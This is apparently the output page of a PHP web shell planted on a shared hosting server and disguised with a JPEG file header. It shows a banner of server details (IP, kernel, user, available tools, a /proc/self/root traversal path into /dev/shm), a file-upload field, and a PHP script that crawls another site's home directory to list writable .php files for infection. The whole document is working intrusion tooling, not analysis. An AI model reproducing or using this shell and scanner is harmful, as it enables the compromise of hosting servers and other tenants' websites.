ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.5 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/dev/shm/ |
Upload File : |
<?php function scan($path, $root) { if ($dir = @opendir($path)) { while (false !== ($file = readdir($dir))) { $p = $path . '/' . $file; if ($file != '.' && $file != '..') { if (is_link($p)) { continue; } elseif (is_file($p) && substr($p, -4) == '.php' && is_writeable($p)) { $res = str_replace($root, '', $p); print "<f>{$res}</f>"; } elseif (is_dir($p)) { scan($p, $root); } } } } } $r = "/home/webteama/cookwithbisht.com"; scan($r, $r); die('!ended!');